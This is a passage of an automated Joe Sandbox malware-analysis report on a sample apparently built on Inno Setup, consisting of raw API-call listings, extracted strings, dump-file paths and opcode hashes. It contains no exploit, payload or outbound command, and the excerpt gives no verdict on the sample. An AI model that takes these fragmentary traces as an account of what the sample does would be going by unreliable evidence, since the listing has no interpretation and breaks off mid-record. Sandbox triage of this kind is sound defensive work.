                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
                                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                            • API String ID: 1914119943-2711329623
                                                                            • Opcode ID: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                            • Instruction ID: a27b950e9f8baa5d3fd7d83d3f5f0f06fd95d714c0010da27a3b0cf72a10e13f
                                                                            • Opcode Fuzzy Hash: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                            • Instruction Fuzzy Hash: AB319471B00604AFDB12EFAACC41D5BB7BDEB897557528466FC04D7252DA38DD04CB28
                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                            • LocalFree.KERNEL32(007B4970,00000000,00401B68), ref: 00401ACF
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,007B4970,00000000,00401B68), ref: 00401AEE
                                                                            • LocalFree.KERNEL32(007B5970,?,00000000,00008000,007B4970,00000000,00401B68), ref: 00401B2D
                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                            • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID: d_{$pI{$pY{
                                                                            • API String ID: 3782394904-1366162678
                                                                            • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                            • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                            • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                            • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                            APIs
                                                                            • RectVisible.GDI32(?,?), ref: 00416E23
                                                                            • SaveDC.GDI32(?), ref: 00416E37
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                            • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                            • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                            • DeleteObject.GDI32(?), ref: 00416F32
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                            • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                            • DeleteObject.GDI32(?), ref: 00416F7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                            • String ID:
                                                                            • API String ID: 375863564-0
                                                                            • Opcode ID: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                            • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                            • Opcode Fuzzy Hash: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                            • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                            APIs
                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                            • String ID:
                                                                            • API String ID: 3985193851-0
                                                                            • Opcode ID: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                            • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                            • Opcode Fuzzy Hash: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                            • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(10000000), ref: 00481499
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004814AD
                                                                            • SendNotifyMessageA.USER32(00010408,00000496,00002710,00000000), ref: 0048151F
                                                                            Strings
                                                                            • Deinitializing Setup., xrefs: 004812FA
                                                                            • GetCustomSetupExitCode, xrefs: 00481339
                                                                            • DeinitializeSetup, xrefs: 00481395
                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
                                                                            • Restarting Windows., xrefs: 004814FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                            • API String ID: 3817813901-1884538726
                                                                            • Opcode ID: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                            • Instruction ID: fb8259b883485ef9100c7f5c1e95e74d54582b152ce66d5af1bc00326fba4159
                                                                            • Opcode Fuzzy Hash: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                            • Instruction Fuzzy Hash: 4451A034704240AFD711EB69D895B2E7BE9FB59704F50887BE801C72B1DB38A846CB5D
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                                            • GetActiveWindow.USER32 ref: 00461A97
                                                                            • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                                            • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                                            • CoUninitialize.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                                            • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                                            • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                            • String ID: A
                                                                            • API String ID: 2684663990-3554254475
                                                                            • Opcode ID: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                            • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                                            • Opcode Fuzzy Hash: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                            • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                                              • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                            • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                            • API String ID: 884541143-1710247218
                                                                            • Opcode ID: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                            • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                                            • Opcode Fuzzy Hash: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                            • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D621
                                                                            • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D631
                                                                            • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D641
                                                                            • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D651
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                            • API String ID: 190572456-3516654456
                                                                            • Opcode ID: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                            • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                                            • Opcode Fuzzy Hash: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                            • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                                            APIs
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                            • 74284D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                            • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Color$StretchText$74284
                                                                            • String ID:
                                                                            • API String ID: 2569610349-0
                                                                            • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                            • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                                            • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                            • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                                            APIs
                                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDirectoryHandleSystem
                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                            • API String ID: 2051275411-1862435767
                                                                            • Opcode ID: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                            • Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
                                                                            • Opcode Fuzzy Hash: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                            • Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
                                                                            APIs
                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
                                                                            • GetSysColor.USER32(00000014), ref: 0044D1C0
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
                                                                            • GetSysColor.USER32(00000010), ref: 0044D212
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                            • String ID:
                                                                            • API String ID: 1005981011-0
                                                                            • Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                            • Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
                                                                            • Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                            • Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041B755
                                                                            • 7427A570.USER32(?), ref: 0041B761
                                                                            • 74278830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                            • 742722A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                            • 74286310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                            • 74278830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 74278830$742774272274286310A570Focus
                                                                            • String ID: k H
                                                                            • API String ID: 167376926-1447039187
                                                                            • Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                            • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                            • Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                            • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041BA27
                                                                            • 7427A570.USER32(?), ref: 0041BA33
                                                                            • 74278830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                            • 742722A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                            • 74286310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                            • 74278830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
